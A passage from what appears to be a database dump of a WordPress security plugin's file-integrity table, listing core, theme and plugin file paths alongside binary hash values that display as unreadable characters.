','',0,'?'),('-�ܕO�r�`�x;��q','wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~V���tj�:��','.�y�@�Ive\Z�?g�d����h�O�����\0','',0,'?'),('-�Lea�_��{S��h�','wp-content/themes/doctors/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�C��-O��p��n','\'���~�+5�H����@�Pl�s�_��]�I�ᥦ','',0,'?'),('-�ha+`NST����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>:�wv��:4p��Y ','Ϲ�%虬Yu{].���ג�d�.��@��','',0,'?'),('.\n��\'�G�Q+�ǥ�','wp-content/themes/doctors/core/home/blocks/testimonial/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�{\n�\'�Y��|','��\\���tV�u��1�\n��Y��;�3��)w�Kg','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.3�3\'<&Ƽ�4uS�n','wp-content/themes/healthcare/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m}�-?w�����@W','R��-ӓ� ����+FFTo����d�&��','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks� V#� �*','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���n`K��T�Qr�','~eY�Ze�s��27��������B/=T�3oH�','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.�f,�K��kp�','wp-content/themes/wp-barrister/content-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Ƹ7�\'뙛0���','���*�Ń�AIs�����]��7�\n���','',0,'?'),('.Լ�DUr3Ҍ~�1','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/selectize/selectize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���>ݒ��/��;','�@o�NRƈj��J�X�P�� �~�0b�','',0,'?'),('.�� r��\Z�Q���','wp-content/plugins/wp-cerber/assets/flags/gm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S\'�A)����zU$',']�Z��!�p������1�{f��^EQ3sH','',0,'?'),('/��� `1\n��e','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/one-column.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�\0ɪ_\r�`','\'ah���Z!����\nk^�jŌ��wq<, ','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߭Φ� ��$=\Z��','��-�����ي�&%����~.+oVr�,>꾥W','',0,'?'),('/++�%̀�4y@cUI�','wp-content/plugins/redirection/models/file-io.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W���E�g[G���V�',' ͙����]�� ����-!m2Ɣk��,��','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f I$ _Z�X�\"0\r��,','',0,'?'),('/?譚��fe<ckV�','wp-content/plugins/disable-gutenberg/inc/settings-register.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zʪ��L�ϓ���h�','IɆ+�]��9�6�7���m�&\n�8]�����','',0,'?'),('/@���~�Ip�� ��','wp-content/plugins/redirection/redirection-version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ì>p*�E�O�','��U�;�xAϦ�&,�m��ߙ��h_̭aD','',0,'?'),('/���C:�ٱ�_���t\"','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-spacing.php',0,'�E�̝�\"�\\~�#Zd;','�E�̝�\"�\\~�#Zd;','7�b�R�4�S���@����s}�.3��EN','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';*������?�d��@','YV$���/���@=������V-��dc�','',0,'?'),('/��M�n�����(�sv','wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/No�\'�n�v��9�,�','�J�P\"Aұ\r�S�P4In\Z*�0A\'�ϫ��p�/]','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('0�ԍ�g-&\0��Ma��','wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��w������A_','��Qھ�I��C��!W-.t�F���ȝ�M�~�','',0,'?'),('0\"��CP?���qnyQa','wp-content/themes/doctors/core/contents/part_header/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����� �!�Z�w�','�ܠ�*v�ݡT�6Q��� 6�g ^~�\"��','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('0<�9���u�;SZ\rj','wp-content/themes/twentytwentyone/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���q*�ëp��hvD�','3�D��U�Bf�0��d��b�kTJuMY,�N','',0,'?'),('0?!��>r��=ͨ �j�','wp-content/themes/vision-lite/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��t`��~� �','4YTBGޥ�y\r���~�w�3i�����~�`�','',0,'?'),('0Sgi� ��\'���','wp-content/themes/healing-touch/images/location-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��G��9,��ƱF',';����O�&2�?�����p5��\n�ʑ�','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p��Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-����v�','�\n!%�D��F��B�^�s��plhVe��7\'U��','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0�%hw�\\k�p���5','wp-content/themes/doctors/core/home/blocks/text/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���ލ;\rT�','dQ��>8��^�:�0�)6�/���{��','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),('0�}[�s�^�o��&��','wp-content/themes/doctors/core/home/home-css-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t\Zt���1Җ�ف�','A��촃�rB�7Xg��ܹ���D/����3','',0,'?'),('0�Q/�M�L\'�Zî��','wp-content/themes/advance/inc/kirki/assets/js/controls/slider.js',0,'A-�2��4���(�28�','A-�2��4���(�28�','�]�G�_3c����[���=�\Z�/�%1&','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j���ӊ%\Z�pã��j.�S','',0,'?'),('0�ň����}m�X9�q','wp-content/plugins/wp-cerber/assets/flags/zm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\|e�D�gk�^���','�yЩ&VUą;�}��D4E���3�)\\','',0,'?'),('0����I��\Z8�\'�x','wp-content/plugins/wp-cerber/assets/flags/tk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȕ��n��e�Y�T��','I��/�:���5s ;�#bi)��4k ����','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���%��K\Z��{�V','���k��^�qݵ;�e8�K���=AaЮM_���','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('1!� I��<Em#','wp-content/plugins/wp-cerber/assets/flags/ee.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��h�~�\rO�����','��R�Bᣛ�݇84ɐ6B����\0ȸ�:l-�IB','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��a2P���KQ��i\"','����F�;L��_����-������-��N��x','',0,'?'),('1A����,\ns����v','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��)��ɾNS(�! 4Z','��/�[��f �nU���!79�8^94����M','',0,'?'),('1Ag\r%�1��kp','wp-content/plugins/redirection/actions/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÍP{�aa�U�\Z!�r�','|w.5]En2�h�=5i+q�Tp ��C��b[','',0,'?'),('1G�[��D��qW�t��','wp-content/plugins/wp-cerber/assets/flags/gy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��B��}��>_�','L�:�,���B[���aa<���w�*@������','',0,'?'),('1^��BsCZU*��M�>','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o�-�6��ѥ�p|','���dd�^�#QҒ\Z�#q�^�Ɠ�J�w�','',0,'?'),('1e�ʀ�~:��X*','wp-content/themes/regina-lite/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]`BRJ�-Z\0ݕ��','�s���9��t�2%�{b�ى��+�2�Oq��','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~','',0,'?'),('1v)���m@�Ǻw��z\r','wp-content/themes/regina-lite/layout/css/pace.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��{�q\0���Y�','����d}��آ+����ra��ҙ�.�\r�','',0,'?'),('1�3\r\rI��W��\\��','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ov_J�ex�� V-\r','�߬a�#�1Ȫ���s�9��;�\0e�oH߉T��','',0,'?'),('1�7�F0ܩ��^ �l','wp-content/plugins/wp-cerber/admin/cerber-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��ေ�yHj�[��','Sʭ��7:Y:`�ǝ�p%��G�%����G�','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7����nb�A�x��','+\r��O��2UP^kD\0(���c��J�<','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('1�ه�җ\"R���\"','wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�HO�N��Z,�L��T',',_��ּ �����+%��$G\rK��?�����','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m� \'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1���Y�,{\\�P����','wp-content/themes/doctors/core/contents/loop_home/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.P���� �\"��',';��\r{ozN�r������w� ��ĸ','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('2�y,\n�&��� ��','wp-content/themes/healthcare/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ri(\\X��7#��R@�','%b��wƋ��w�E�U���U��n} y���G','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ���լިF��','��w���R�x��$�r�դɯ�D���`.��u','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r��T��tu�','yA�y3�h�|�Г�L�����i=���>�j','',0,'?'),('2\'G����됳Z0�e�','wp-content/themes/advance/inc/kirki/assets/js/controls/number.js',0,'��{�)��j,�Y�dX�','��{�)��j,�Y�dX�','��A�\r�B@�?X�����F*��Ѹ���','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9����\n)��Fu','4�WZ�!VH-~~`⟜�is�G�m@�7�n�','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T/�mWeP�X<x�}�t','��[:�{A�I��BY��C&���Op\'6�','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('2j]��n.^�s:���F�','wp-content/themes/healing-touch/images/social/gplus.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`Z�q\\��S~��\'�3','�Ƽ15n_���1t�=�l� �P78u6[�9�','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����؉�� �m/J�~','�}�\r:�jg���E�˾V(]h�x��t','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2�E���γŷ���','wp-content/plugins/wp-cerber/assets/flags/ps.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��P-�6@%','%�AD���E���P�Ǖ��|�u��Ć�C�!','',0,'?'),('2��mP�<�o�L�)','wp-content/themes/weblog/acmethemes/customizer/single-posts/single-post-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�o���b�d��I','JqݪD8�ug�F̝�9�$�F���k9��6C�x','',0,'?'),('2�|�(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K8ۨ��)','.�%�����]:/$zԢ��S�_�)kER��','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2����a��֥wl�.d�','wp-content/themes/healing-touch/images/about-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&IY>4�}[P>ix�',')?�,��g2��<�A�HSo7Ibg�3�����','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��J�cW�&��Y�','i�+W�M�E4�\n�#S�-^�?�ݻ��,�9','',0,'?'),('2���j�B��� ��','wp-content/themes/healthcare/images/portfolio/1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �ף�c�X.w��B�','�-�[<f�lUeȡ-�n��\0�&:mb+�n���','',0,'?'),('2�^wh]�f��n�4P�','wp-content/themes/skt-toothy/customize-pro/example-1/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�ԟ/=�yQ|','\Z�ѡ)h�<��#�i~P+�Y�,�S�s[}��','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f��u���ן)','���Vb�p�O+ �N$�uw���}�h�\"�','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('3��J��c$�\Z+','wp-content/plugins/wordfence/js/date.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('3)e/`���/\r�Ph=','wp-content/plugins/wp-cerber/assets/flags/bf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��>��=��$�.��','�Ȋ:��h�.�n(xD⃪F\"{`iN�\0#��','',0,'?'),('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�R?�\"�`�$�`','! �n��śU7B��5gr� 1�*;R�','',0,'?'),('3J��тImVvzew�$','wp-content/themes/skt-toothy/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$[x��i��Z�)��','��Qy��(�\'�]��\'�E�A���+�','',0,'?'),('3Y�#��6r\n�Yp�$��','wordfence-waf.php',0,'L�G�i���Y�����','L�G�i���Y�����','~���*�Z-b0,��A?��>L���G�\"Z����','',0,'?'),('3fDr)�{��w�� #','wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('3h���\"I+[��E','wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԓs� 5C�ɚ�b��LF','���ʿ�Iv�+>Y�h�b�F\\x��v�.wT','',0,'?'),('3k��oW�5 k[mq','wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W_��T�ӰI�Y�֛','2ɟ��tb;6@\Zq\'��Q��H�j ��m���ѫ�','',0,'?'),('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=��p�5%�h$�*�','s�B`]��b��p�M���0�\\�s�w�D{����','',0,'?'),('3�S�#ǣ+Ke�\0Ⱦ','wp-content/plugins/wp-cerber/assets/flags/la.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3MU\'���\Zkr�c&��','[�lԬ�`�l !_���>�kwd�X��p���_','',0,'?'),('3��JΑTg�0��\'e','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4���uB\nE�#@��W',')r�xUYJ�;hpjH{\\����1\'#�� s�','',0,'?'),('3�Z�mڊ�+���hx0','wp-content/themes/wp-barrister/library/images/icon-rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�<�\r�����eP\0Z','�p���bG�1���)L�ʩ-n�wn���T�','',0,'?'),('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('3�s !q�Uh�G:','wp-content/themes/regina-lite/layout/images/home/testimonial-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Uޝ�t{).4����#','�+|(��Ru4��ĝAЁ�nK�,���9�','',0,'?'),('3��ng\0��\\\0 �W','wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('3���g���BP��O','wp-content/plugins/redirection/locale/json/redirection-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u{��؝p,�]�A:@','xHҝ�ygR�zA}�蓀�\'����\'�=�','',0,'?'),('4�q\\��L5�*/�','wp-content/themes/regina-lite/layout/css/owl-theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�L8��\"����','ė;�b\0�m��G�{Ȑ~�.���`�i�G!&�','',0,'?'),('4p�����{�H�U�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�e���7�e��f','z�Y\0H9���_ƪ���CHC<� ��E�','',0,'?'),('4\n�� m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�+e��[e�ϙ�fW�','QA��u&�{Ai��XP�K�[�{0�Q�k��','',0,'?'),('4�31@�*r�����8','wp-includes/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ś�L�\\�Pڜ�U','c>�5�o��������_�T9�L~;�e7�','',0,'?'),('48�Vt���+^X�','wp-includes/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','! /�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('4;`߯z�? �{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h»����$\ZPfX�','�ƪɝ����U[Z~��^�d�\'�X�ٮ���','',0,'?'),('4AI�n09��7c`','wp-includes/js/tinymce/utils/validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CL�1?o+;���{Y�','k�H��;�\0�kC�s� \'K�#45+eE|���0','',0,'?'),('4To���iE��t�','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�I�SD���D\Z.{','o�N�Wl����y�����]�����\'�����','',0,'?'),('4a�[I�}���H�m)','wp-admin/css/deprecated-media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M>��_�^�����9F','.��*�AU�u0� \'�Q�2˻�=�x4w��g�','',0,'?'),('4�d$%ia)*J1��˩W','wp-content/themes/regina-lite/layout/js/preloader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x���h�#�\\�','\Z��Kµ�J��u�߳�=��>e��R�<�3�','',0,'?'),('4���9�7��Tb��~~','wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;0��#�B���n','ѹ�T)��f�-D�/kFb��y�����H�','',0,'?'),('4�\"�3���\"��9�','wp-content/themes/healthcare/css/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#X;I�M~�8��=��Q','�P�H�>����\"Wz�*�s�����֬�{R�','',0,'?'),('4ڂ��L$�,K[�u��','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�8\nP*�a|/ٳK','XdB�c\0���2��Ý��c���g�������','',0,'?'),('5���xi��F��C*�','wp-content/themes/advance/inc/kirki/includes/class-kirki-values.php',0,'�K��؆�����չ�','�K��؆�����չ�','P_=&߁���X�Z�ۉ���D��3�i���KM%','',0,'?'),('5�?��y��<�2�','wp-admin/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o0�Dk�ģ\'-5�S�','����r�?�\0��1�}2�IDse�K���W�k�','',0,'?'),('5.=���d)<p�eu�s^','wp-includes/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vr���Β;Y���o$Y','�����}� Y�1q$VY�8k\rt 